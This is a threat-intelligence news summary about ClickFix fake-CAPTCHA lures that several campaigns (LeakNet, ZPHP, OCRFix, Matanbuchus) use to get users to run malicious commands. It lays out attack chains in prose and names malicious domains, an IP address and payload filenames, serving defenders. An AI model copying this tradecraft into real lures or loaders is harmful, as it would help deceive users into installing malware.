ClickFix Social Engineering Drives Multiple Malware and Ransomware Intrusions
Attackers are increasingly using ClickFix fake CAPTCHA and verification lures on compromised websites to trick users into manually executing malicious commands, turning social engineering into a scalable initial-access method. LeakNet adopted the technique to reduce reliance on stolen credentials and initial access brokers, using hacked sites to deliver a staged Deno-based in-memory loader before following a repeatable post-exploitation sequence that can end in ransomware deployment. Separately, the ZPHP campaign used similar fake Cloudflare Turnstile-style prompts against U.S. SLTT organizations to deliver Remcos RAT, with hidden JavaScript on compromised sites selectively replacing page content with attacker-controlled instructions for Windows users.
The reporting indicates a broader shift in which ClickFix is no longer tied to a single actor or payload, but is being reused across financially motivated and malware-delivery operations because it is cheap, effective, and difficult for users to recognize as malicious. One additional roundup reference points to Termite ransomware and CastleRAT activity linked to ClickFix, reinforcing that the technique is spreading across campaigns, but it does not provide enough detail to treat that activity as the same incident as LeakNet or ZPHP. This is not fluff: the material contains concrete threat intelligence on active intrusion methods, victim targeting, malware delivery chains, and operational tradecraft relevant to enterprise defense.
Timeline
Mar 17, 2026
CIS publishes analysis of ZPHP ClickFix campaign and SLTT impact
CIS released technical details on the ZPHP campaign, describing a kill chain involving malicious JavaScript, mshta.exe, an HTA file, PowerShell, a large ZIP archive, and DLL sideloading with in-memory decryption to deploy Remcos RAT. The organization said it had linked the activity to multiple SLTT incidents and observed substantial detection and blocking volume across its monitoring services.
Mar 17, 2026
ReliaQuest links separate Teams phishing attempt to same LeakNet loader chain
ReliaQuest said a distinct Microsoft Teams phishing intrusion attempt resulted in the same Deno-based loader and similar post-compromise activity seen in the ClickFix intrusions. This indicated LeakNet was using multiple initial access methods that converged on the same tooling and attack sequence.
Mar 17, 2026
LeakNet adopts ClickFix via compromised websites for initial access
ReliaQuest reported that LeakNet shifted from relying on stolen credentials from initial access brokers to using ClickFix social engineering delivered through hacked websites. Victims were prompted by fake CAPTCHA pages to run a malicious msiexec.exe command, leading to a Deno-based in-memory loader and a repeatable post-exploitation chain ending in data theft and encryption.
Jan 1, 2026
ZPHP campaign targets U.S. SLTT organizations with Remcos RAT
In 2026, CIS observed an ongoing ZPHP malware campaign affecting U.S. State, Local, Tribal, and Territorial government organizations. The activity used compromised websites, fake Cloudflare Turnstile CAPTCHA pages, and ClickFix lures to trick users into executing malicious commands that ultimately deployed Remcos RAT.
Nov 1, 2024
LeakNet ransomware operation emerges
LeakNet emerged in November 2024 and described itself as a "digital watchdog." Reporting cited by ReliaQuest also noted the group has targeted industrial entities, according to Dragos.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Malware
Affected Products
Sources
Related Stories
ClickFix Social Engineering Campaigns Expand Malware and Ransomware Delivery
Researchers reported continued expansion of **ClickFix** as an initial-access technique, with attackers using fake CAPTCHA or verification pages to trick users into executing clipboard-delivered commands on Windows systems. In one campaign, **LeakNet** shifted away from relying on initial access brokers and instead used compromised legitimate websites hosting fake Cloudflare Turnstile checks to broaden victim acquisition and reduce network-based detection. ReliaQuest linked the activity to LeakNet through overlapping infrastructure and consistent TTPs, and noted the group paired ClickFix with a stealthy, memory-resident loader built on the **Deno** JavaScript runtime to support ransomware operations. A separate ClickFix campaign analyzed by Atos used the same user-executed command pattern to map attacker-controlled network drives with `net use`, then download a trojanized but legitimately signed *WorkFlowy* application whose modified `asar` archive executed malicious code in the **Node.js** main process with the logged-in user’s privileges. Other reporting on **Hive0163** also identified ClickFix as one of several initial-access methods used in **Interlock** ransomware intrusions, although that article focused primarily on the group’s likely AI-generated **Slopoly** malware rather than a specific ClickFix incident. Reporting on **Operation Covert Access** in Argentina’s judicial sector was unrelated, describing spear-phishing with fake court documents to deliver **COVERT RAT** via a different intrusion chain.
1 months ago
ClickFix Social-Engineering Technique Used to Trick Users Into Running Malware
Multiple reports highlighted **ClickFix**, a social-engineering technique that uses fake verification or update prompts to coerce users into manually executing attacker-supplied commands, as a recurring initial access method in recent malware activity. In the **OCRFix** botnet campaign, victims were lured to a typosquatted site impersonating *Tesseract OCR* (`tesseract-ocr[.]com` lookalike) via SEO poisoning and reported **LLM poisoning** (chatbot recommendations pointing users to the malicious site). The site presented a fake CAPTCHA that copied an obfuscated PowerShell command to the clipboard and instructed the user to paste it into PowerShell; this led to retrieval of a malicious MSI (`98166e51.msi`) from `opsecdefcloud[.]com`, after which victims were redirected to the legitimate GitHub project to reduce suspicion. The loader then queried a **BNB TestNet** smart contract to obtain C2 details, using **EtherHiding** (blockchain-hosted instructions) to make takedown and disruption more difficult. A separate investigation described a **Chrome extension supply-chain compromise** of *QuickLens – Search Screen with Google Lens* (7,000+ users), where attackers acquired the extension and shipped an update embedding malicious scripts and elevated permissions to enable credential/crypto theft and staged payload delivery; the campaign also incorporated a **ClickFix** flow that masqueraded as a legitimate browser update to trick users into executing malicious code. Other items in the set covered different topics: an AiTM phishing-kit attribution case study (focused on reverse-proxy phishing infrastructure rather than ClickFix), research on **Funnull/Fangneng CDN** as cybercrime-enabling infrastructure and related supply-chain activity, and Zscaler reporting on **Dust Specter APT** targeting Iraqi government officials with password-protected RAR delivery and custom malware modules—none of which were primarily about ClickFix.
1 months ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
1 months ago